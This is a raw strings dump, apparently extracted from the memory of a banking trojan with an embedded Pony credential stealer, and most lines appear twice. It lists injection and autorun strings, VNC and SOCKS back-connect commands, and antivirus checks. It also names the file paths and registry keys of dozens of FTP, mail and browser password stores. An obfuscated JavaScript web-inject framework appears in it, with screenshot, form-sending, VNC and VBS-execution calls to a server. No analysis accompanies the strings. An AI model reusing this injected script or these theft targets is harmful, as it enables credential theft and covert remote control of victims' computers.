[%s - X64 EQ PID: %u TID: %u]

[%s - X64 EQ PID: %u TID: %u]

\SysWOW64\regsvr32.exe

\SysWOW64\regsvr32.exe

[Pony] Fail create process: %u

[Pony] Fail create process: %u

[PONY] Fail inject to process: %u

[PONY] Fail inject to process: %u

echrome.dll

echrome.dll

iexplore.exe

iexplore.exe

chrome.exe

chrome.exe

\System32\KERNEL32.DLL

\System32\KERNEL32.DLL

\System32\kernelbase.dll

\System32\kernelbase.dll

\ThemeApiPort

\ThemeApiPort

Explorer.EXE_888_rwx_02000000_0007C000:

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

HHt.HHt

HHt.HHt

More information: hXXp://VVV.ibsensoftware.com/

More information: hXXp://VVV.ibsensoftware.com/

8HttpAddRequestHeadersA

8HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

wininet.dll

wininet.dll

rapport

rapport

ieframe.dll

ieframe.dll

NSPR4.DLL

NSPR4.DLL

nss3.dll

nss3.dll

KERNEL32.DLL

KERNEL32.DLL

\Google\Chrome\User Data\Default\

\Google\Chrome\User Data\Default\

\Mozilla\Firefox\Profiles\

\Mozilla\Firefox\Profiles\

sol_chrome/

sol_chrome/

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

.rdata

.rdata

@http

@http

SELECT url FROM moz_places

SELECT url FROM moz_places

places.sqlite

places.sqlite

ie/history.txt

ie/history.txt

ff/history.txt

ff/history.txt

ff/%u/places.sqlite

ff/%u/places.sqlite

framework_key%

framework_key%

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval('var %s '

eval('var %s '

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

%s.Key = '%s';

%s.Key = '%s';

%s.Hide('%0.8X%0.8X');

%s.Hide('%0.8X%0.8X');

CertificateAuthority

CertificateAuthority

%s.pfx

%s.pfx

cookies.sqlite

cookies.sqlite

cookies.sqlite-journal

cookies.sqlite-journal

ff/%u/cookies.sqlite

ff/%u/cookies.sqlite

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

[%s - X32 EQ PID: %u TID: %u]

[%s - X32 EQ PID: %u TID: %u]

X-Firefox-Spdy

X-Firefox-Spdy

X-WebKit-CSP

X-WebKit-CSP

hXXps://

hXXps://

HTTP/1.1 200 OK

HTTP/1.1 200 OK

Content-Length: %u

Content-Length: %u

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.0

GET /favicon.ico HTTP/1.0

login=%s&pass=%s

login=%s&pass=%s

chrome.dll

chrome.dll

127.0.0.1

127.0.0.1

DrWeb

DrWeb

McAfee.com

McAfee.com

Doctor Web

Doctor Web

Common Files\Doctor Web

Common Files\Doctor Web

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

regsvr32.exe "%s"

regsvr32.exe "%s"

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

[VNC] Parse param error: %s

[VNC] Parse param error: %s

\regsvr32.exe

\regsvr32.exe

[VNC] Fail create process: %u

[VNC] Fail create process: %u

[VNC] Fail inject to process: %u

[VNC] Fail inject to process: %u

fv_%u.avi

fv_%u.avi

#FV_%u

#FV_%u

#FV_%s

#FV_%s

pass.txt

pass.txt

cert.pfx

cert.pfx

PFXImportCertStore

PFXImportCertStore

Crypt32.dll

Crypt32.dll

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3-1", false);

user_pref("network.http.spdy.enabled.v3-1", false);

prefs.js

prefs.js

csrss.exe

csrss.exe

smss.exe

smss.exe

wininit.exe

wininit.exe

services.exe

services.exe

svchost.exe

svchost.exe

lsas.exe

lsas.exe

lsm.exe

lsm.exe

winlogon.exe

winlogon.exe

taskhost.exe

taskhost.exe

HttpEndRequestA

HttpEndRequestA

HttpEndRequestW

HttpEndRequestW

ADVAPI32.DLL

ADVAPI32.DLL

Init in Browser = %u

Init in Browser = %u

Init in Shell = %u

Init in Shell = %u

[Socks] Failt connect BC [%s:%u]

[Socks] Failt connect BC [%s:%u]

[Socks] Fail parse param: %s

[Socks] Fail parse param: %s

Shell Update Exists %s = %s

Shell Update Exists %s = %s

Shell Reload status = %u = %u

Shell Reload status = %u = %u

#cert

#cert

Del Old = %s

Del Old = %s

Del Reg = %s

Del Reg = %s

Fail Save New = %u

Fail Save New = %u

Reg Autorun = %u = %u = %ws = %ws

Reg Autorun = %u = %u = %ws = %ws

Updated fail size %u != %u

Updated fail size %u != %u

Updated RSA Init fail = %u

Updated RSA Init fail = %u

Sign Bad = %u

Sign Bad = %u

Save New File = %u = %u

Save New File = %u = %u

Update_InstallNew = %u = %u

Update_InstallNew = %u = %u

[Pony] Fail Get Pass

[Pony] Fail Get Pass

Start Update: %s = %u

Start Update: %s = %u

download status = %u =%u

download status = %u =%u

Updated status = %u

Updated status = %u

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status[Local]: %u = %u

DL_EXEC Status[Local]: %u = %u

Start Socks addr: %s

Start Socks addr: %s

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Local]: %u

Start Socks Status[Local]: %u

Start VNC addr: %s

Start VNC addr: %s

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Local]: %u

Start VNC Status[Local]: %u

msvcrt.dll

msvcrt.dll

%0.8X%0.8X%c

%0.8X%0.8X%c

firefox.exe

firefox.exe

explorer.exe

explorer.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%Program Files%\Mozilla Firefox\

%Program Files%\Mozilla Firefox\

mozsqlite3.dll

mozsqlite3.dll

sqlite3_open

sqlite3_open

sqlite3_exec

sqlite3_exec

sqlite3_close

sqlite3_close

sqlite3_free

sqlite3_free

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

hXXp://

hXXp://

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

\\.\pipe\

\\.\pipe\

PID: %u [%0.2u:%0.2u:%0.2u]

PID: %u [%0.2u:%0.2u:%0.2u]

[BC] Cmd Ver Error

[BC] Cmd Ver Error

[BC] Wait Ping error %u[%u]

[BC] Wait Ping error %u[%u]

[BC] Fail Connect: %u

[BC] Fail Connect: %u

[BC] Fail read cmd

[BC] Fail read cmd

[BC] Cmd need reauth

[BC] Cmd need reauth

[BC] cmd error: %u

[BC] cmd error: %u

[BC] Cmd need disconnect

[BC] Cmd need disconnect

ntdll.dll

ntdll.dll

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

account.cfg

account.cfg

account.cfn

account.cfn

Dir #%u

Dir #%u

.oeaccount

.oeaccount

Software\Microsoft\Windows Live Mail

Software\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

Software\Microsoft\Windows Mail

Software\Microsoft\Windows Mail

\Microsoft\Windows Mail

\Microsoft\Windows Mail

PopPort

PopPort

PopPassword

PopPassword

SmtpServer

SmtpServer

SmtpPort

SmtpPort

SmtpAccount

SmtpAccount

SmtpPassword

SmtpPassword

abe2869f-9b47-4cd9-a358-c22904dba7f7

abe2869f-9b47-4cd9-a358-c22904dba7f7

MS IE FTP Passwords

MS IE FTP Passwords

RushSite.xml

RushSite.xml

\FTPRush

\FTPRush

bitkinex.ds

bitkinex.ds

NDSites.ini

NDSites.ini

Software\LeechFTP

Software\LeechFTP

bookmark.dat

bookmark.dat

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

sites.db

sites.db

servers.xml

servers.xml

\FTPGetter

\FTPGetter

ESTdb2.dat

ESTdb2.dat

\Estsoft\ALFTP

\Estsoft\ALFTP

QData.dat

QData.dat

SM.arch

SM.arch

FTP .Link\shell\open\command

FTP .Link\shell\open\command

NppFTP.xml

NppFTP.xml

Software\MAS-Soft\FTPInfo\Setup

Software\MAS-Soft\FTPInfo\Setup

ServerList.xml

ServerList.xml

\FTPInfo

\FTPInfo

NovaFTP.db

NovaFTP.db

\INSoftware\NovaFTP

\INSoftware\NovaFTP

\sites.xml

\sites.xml

ftplast.osd

ftplast.osd

\SharedSettings.ccs

\SharedSettings.ccs

\SharedSettings.sqlite

\SharedSettings.sqlite

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.sqlite

\SharedSettings_1_0_5.sqlite

\32BitFtp.ini

\32BitFtp.ini

FTPCON

FTPCON

FTP CONTROL

FTP CONTROL

FTPVoyager.ftp

FTPVoyager.ftp

\RhinoSoft.com

\RhinoSoft.com

FTPVoyager.qc

FTPVoyager.qc

FTPVoyager.Archive

FTPVoyager.Archive

SiteInfo.QFP

SiteInfo.QFP

WinFTP

WinFTP

DeluxeFTP

DeluxeFTP

sites.xml

sites.xml

Staff-FTP

Staff-FTP

sites.ini

sites.ini

FreshFTP

FreshFTP

Software\FlashPeak\BlazeFtp\Settings

Software\FlashPeak\BlazeFtp\Settings

LastPassword

LastPassword

LastPort

LastPort

BlazeFtp

BlazeFtp

site.dat

site.dat

\BlazeFtp

\BlazeFtp

GoFTP

GoFTP

Connections.txt

Connections.txt

3D-FTP

3D-FTP

\3D-FTP

\3D-FTP

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

EasyFTP

EasyFTP

FTPNow

FTPNow

FTP Now

FTP Now

FTPShell

FTPShell

ftpshell.fsi

ftpshell.fsi

ftpsite.ini

ftpsite.ini

FTPList.db

FTPList.db

My FTP

My FTP

project.ini

project.ini

Mailbox.ini

Mailbox.ini

FTP Navigator

FTP Navigator

FTP Commander

FTP Commander

ftplist.txt

ftplist.txt

Software\Sota\FFFTP

Software\Sota\FFFTP

Software\Sota\FFFTP\Options

Software\Sota\FFFTP\Options

Software\FTPWare\COREFTP\Sites

Software\FTPWare\COREFTP\Sites

FtpPort

FtpPort

Software\Cryer\WebSitePublisher

Software\Cryer\WebSitePublisher

_Password

_Password

Software\NCH Software\ClassicFTP\FTPAccounts

Software\NCH Software\ClassicFTP\FTPAccounts

FtpPassword

FtpPassword

_FtpPassword

_FtpPassword

FtpServer

FtpServer

FtpUserName

FtpUserName

FtpDirectory

FtpDirectory

Software\FTPClient\Sites

Software\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

PortNumber

PortNumber

PassWord

PassWord

Software\South River Technologies\WebDrive\Connections

Software\South River Technologies\WebDrive\Connections

Software\LinasFTP\Site Manager

Software\LinasFTP\Site Manager

FTP destination password

FTP destination password

FTP destination server

FTP destination server

FTP destination port

FTP destination port

FTP destination user

FTP destination user

FTP destination catalog

FTP destination catalog

FTP profiles

FTP profiles

Msi.dll

Msi.dll

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

\PocoSystem.ini

\PocoSystem.ini

accounts.ini

accounts.ini

sites.dat

sites.dat

\LeapWare\LeapFTP

\LeapWare\LeapFTP

unleap.exe

unleap.exe

leapftp

leapftp

FtpIniName

FtpIniName

Software\Ghisler\Windows Commander

Software\Ghisler\Windows Commander

wcx_PTF.ini

wcx_PTF.ini

Server.Pass

Server.Pass

Server.Host

Server.Host

Server.User

Server.User

Server.Port

Server.Port

Last Server Pass

Last Server Pass

Last Server Port

Last Server Port

\sitemanager.xml

\sitemanager.xml

\recentservers.xml

\recentservers.xml

\filezilla.xml

\filezilla.xml

"password" : "

"password" : "

"password":"

"password":"

\drives.js

\drives.js

\ExpanDrive\favorites.js

\ExpanDrive\favorites.js

\ExpanDrive\drives.js

\ExpanDrive\drives.js

wiseftpsrvs.ini

wiseftpsrvs.ini

wisePTF.ini

wisePTF.ini

wiseftpsrvs.bin

wiseftpsrvs.bin

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

FTP Count

FTP Count

FTP File%u

FTP File%u

Robo-FTP

Robo-FTP

SOFTWARE\%s\FTPServers

SOFTWARE\%s\FTPServers

user.config

user.config

.duck

.duck

SiteServer %u\Host

SiteServer %u\Host

SiteServer %u\WebUrl

SiteServer %u\WebUrl

SiteServer %u\Remote Directory

SiteServer %u\Remote Directory

SiteServer %u-User

SiteServer %u-User

SiteServer %u-User PW

SiteServer %u-User PW

SiteServer %u\SFTP

SiteServer %u\SFTP

Keychain

Keychain

Software\Nico Mak Computing\WinZip\FTP

Software\Nico Mak Computing\WinZip\FTP

Password

Password

Software\Far\Plugins\FTP\Hosts

Software\Far\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far\SavedDialogHistory\FTPHost

Software\Far\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

\win.ini

\win.ini

WS_FTP

WS_FTP

\Ipswitch\WS_FTP

\Ipswitch\WS_FTP

\GlobalSCAPE\CuteFTP

\GlobalSCAPE\CuteFTP

sm.dat

sm.dat

\GlobalSCAPE\CuteFTP Pro
